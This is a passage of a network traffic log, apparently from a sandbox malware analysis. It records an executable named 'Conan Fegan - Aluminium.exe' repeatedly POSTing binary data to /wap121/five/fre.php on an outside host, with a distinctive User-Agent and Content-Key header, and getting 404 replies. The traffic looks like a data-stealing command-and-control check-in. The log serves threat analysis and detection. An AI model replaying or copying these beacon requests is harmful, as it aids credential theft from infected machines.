                                          Feb 22, 2021 19:13:22.669300079 CET1577OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:23.380831003 CET1578INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          16192.168.2.449765203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:24.013552904 CET1578OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:24.744710922 CET1579INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:24 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          17192.168.2.449766203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:25.353621006 CET1580OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:26.056929111 CET1581INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          18192.168.2.449767203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:26.968743086 CET1581OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:27.672360897 CET1582INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          19192.168.2.449768203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:28.278127909 CET1583OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:28.982165098 CET1584INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.449749203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:04.676480055 CET1448OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:05.396814108 CET1448INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:05 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          20192.168.2.449769203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:29.579658985 CET1584OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:30.280127048 CET1585INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:30 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          21192.168.2.449770203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:30.894737959 CET1586OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:31.604202986 CET1586INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          22192.168.2.449771203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:32.184418917 CET1587OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:32.894319057 CET1588INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          23192.168.2.449772203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:33.518151999 CET1589OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:34.233598948 CET1589INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:34 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          24192.168.2.449773203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:34.813981056 CET1590OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:35.516104937 CET1591INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          25192.168.2.449774203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:36.095386982 CET1592OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:36.808944941 CET1653INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          26192.168.2.449777203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:37.374891996 CET1681OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:38.080215931 CET1774INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          27192.168.2.449781203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:38.688700914 CET1837OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:39.392492056 CET1912INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          28192.168.2.449784203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:39.984081984 CET2001OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:40.691271067 CET2188INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          29192.168.2.449788203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:41.300879002 CET2227OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:42.004107952 CET2418INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.449750203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:06.053559065 CET1449OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:06.769673109 CET1538INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          30192.168.2.449790203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:42.586766958 CET2468OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:43.288108110 CET2500INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:43 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          31192.168.2.449792203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:43.872009993 CET2501OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:44.576299906 CET2502INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:44 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          32192.168.2.449793203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:45.134991884 CET2503OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:45.838083982 CET2504INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:45 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          33192.168.2.449794203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:46.448703051 CET2505OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:47.172113895 CET2505INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:47 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          34192.168.2.449795203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:47.761298895 CET2506OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:48.467871904 CET2507INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:48 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          35192.168.2.449796203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:49.047257900 CET2508OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:49.748456955 CET2508INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:49 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          36192.168.2.449797203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:50.324886084 CET2509OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:51.031461954 CET2510INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:50 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          37192.168.2.449798203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:51.622675896 CET2511OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:52.330063105 CET2511INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:52 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          38192.168.2.449799203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:52.940188885 CET2512OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:53.654052973 CET2513INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          39192.168.2.449800203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:54.217315912 CET2528OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:54.922338009 CET2570INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:54 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.449751203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:07.581440926 CET1539OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:08.297547102 CET1539INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          40192.168.2.449804203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:55.493777990 CET2576OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:56.195640087 CET2582INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          41192.168.2.449805203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:56.763031960 CET2587OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
